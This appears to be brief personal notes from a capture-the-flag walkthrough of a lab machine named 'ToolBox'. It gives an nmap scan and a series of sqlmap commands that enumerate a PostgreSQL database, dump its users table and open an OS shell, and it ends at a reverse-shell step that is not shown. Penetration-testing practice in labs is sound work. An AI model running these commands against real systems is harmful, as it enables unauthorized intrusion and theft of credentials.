ToolBox | Notion

Let’s scan the IP

sudo nmap -sC -sV -sS -O -A -oN nmap.txt --min-rate=1000 -Pn -p 49666,5985,49665,139,47001,49664,445,49668,135,443,49667,49669 --open 10.129.96.171

Let’s navigate to the website

let’s add the request to the sqlmap

Now let’s check the database names

sqlmap -r req.txt --level 5 --risk 3 --batch --threads 10 --random-agent --dbms=postgres --proxy <https://127.0.0.1:8080> --dbs

Now let’s dump the tables

sqlmap -r req.txt --level 5 --risk 3 --batch --threads 10 --random-agent --dbms=postgres --proxy <https://127.0.0.1:8080> -D public --tables

Now let’s dump the users tables

sqlmap -r req.txt --level 5 --risk 3 --batch --threads 10 --random-agent --dbms=postgres --proxy <https://127.0.0.1:8080> -D public -T users --dump-all

now let’s use —os-shell

sqlmap -r req.txt --level 5 --risk 3 --threads 10 --random-agent --dbms=postgres --proxy <https://127.0.0.1:8080> -D public -T users --os-shell

Let’s get a reverse shell